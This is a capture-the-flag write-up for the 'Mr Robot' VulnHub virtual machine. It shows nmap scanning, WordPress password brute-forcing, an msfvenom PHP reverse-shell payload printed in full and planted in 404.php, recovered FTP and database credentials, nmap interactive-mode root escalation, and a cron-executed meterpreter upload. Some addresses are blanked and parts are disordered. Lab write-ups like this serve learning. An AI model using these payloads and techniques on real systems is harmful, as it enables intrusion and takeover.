Mr Robot

This is my write-up for Mr Robot vm on vulnhub

Link To Vulnhub

As usual we start with a good old nmap scan 🙂

nmap -A -p - -T5

Starting Nmap 7.12 ( ) at 2016-07-01 20:00 EDT
Nmap scan report for linux (
Host is up (0.00051s latency).
Not shown: 65532 filtered ports
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject:
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:38:35:A7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1
Network Distance: 1 hop

1   0.51 ms linux (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 70.40 seconds

Checking the robots.txt revealed a dictionary and the first key.

User-agent: *



Because the dictionary have multiple entry i needed to sort it and remove the duplicate

cat fsocity.dic | sort -u > fsociety.lst

There is a web server running we start dirb and nikto to learn more about the web servers.

We can see there is a wordpress running on the server.

wpscan -u --wordlist /root/Dropbox/Vulnhub/MrRobot/fsocity.dic --username user 

I first used user as the user to bruteforce because on the website it say welcome to user’s wordpress.

But since it didnt work i had to think about different user this wordpress would have, since the name of the vm is Mr Robot and the main character of Mr Robot is called Elliot, i had to try with this user also.

wpscan -u --wordlist /root/Dropbox/Vulnhub/MrRobot/fsociety.lst --username Elliot

Brute Forcing 'Elliot' Time: 00:02:54  (5636 / 11452) 49.21%  ETA: 00:03:00
  | Id | Login  | Name | Password  |
  |    | Elliot |      | ER28-0652 |

We can now login in the wordpress and change the content of 404.php to any php code of our liking
I used this php code which is generate by msfvenom

/*<?php /**/ error_reporting(0); $ip = ''; $port = 443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();


Get a shell as the user deamon

with the shell we can see the user robot in /home/robot
ls -larth
total 16K
drwxr-xr-x 3 root root 4.0K Nov 13 2015 ..
drwxr-xr-x 2 root root 4.0K Nov 13 2015 .
-r——– 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r–r– 1 robot robot 39 Nov 13 2015 password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
a quick google search with the hash gives us

so we can switch user with su robot
password is abcdefghijklmnopqrstuvwxyz

from enumerating the system we can see there is a config file for the server with the database password in it, and the ftp user and password.
define(‘FS_METHOD’, ‘ftpext’);
define(‘FTP_BASE’, ‘/opt/bitnami/apps/wordpress/htdocs/’);
define(‘FTP_USER’, ‘bitnamiftp’);
define(‘FTP_PASS’, ‘inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a’);
define(‘FTP_HOST’, ‘’);
define(‘FTP_SSL’, false);

and the database configuration

/** The name of the database for WordPress */
define(‘DB_NAME’, ‘bitnami_wordpress’);

/** MySQL database username */
define(‘DB_USER’, ‘bn_wordpress’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘570fd42948’);

/** MySQL hostname */
define(‘DB_HOST’, ‘localhost:3306’);

With the ftp user i can read and write as the user but that didn’t help me get a root shell even tho there is a crontab running that use the bitnami user for it.

What ended me the root shell is i realized i was using nmap as a non root user but nmap still run as root!
nmap got an interactive option that can grant you a shell to get it just type.

nmap –interactive
There we got the root shell! 🙂

cat key-3-of-3.txt
# whoami

Thank you for reading this 🙂

nmap installed on the box and user robot is allowed to scan with it, so i did a bunch of scans locally to discover that there is an ftp service running on the box.

nc -v

nc -v 21
nc -v 21
Connection to 21 port [tcp/ftp] succeeded!
220 (vsFTPd 3.0.2)
USER bitnamiftp
USER bitnamiftp
331 Please specify the password.
PASS inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a
PASS inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a
230 Login successful.
CWD bitnami
CWD bitnami
250 Directory successfully changed.
CWD stats
CWD stats
550 Failed to change directory.
CWD /opt/bitnami/stats
CWD /opt/bitnami/stats
250 Directory successfully changed.
227 Entering Passive Mode (127,0,0,1,41,198).
150 Here comes the directory listing.
226 Directory send OK.
STOR ./agent.bin
STOR ./agent.bin
425 Use PORT or PASV first.
227 Entering Passive Mode (127,0,0,1,138,47).
STOR /opt/bitnami/stats/agent.bin
STOR /opt/bitnami/stats/agent.bin
425 Failed to establish connection.

227 Entering Passive Mode (127,0,0,1,34,208).
STOR /opt/bitnami/stats/agent.bin
STOR /opt/bitnami/stats/agent.bin
150 Ok to send data.
226 Transfer complete.
421 Timeout.
nc -v 35375 < /tmp/vipermeter.elf
#This will transfer the vipermeter.elf to agent.bin with is executed in the crontab at every hours finishing ith 55 minutesx

to get a shell as root
nmap –interactive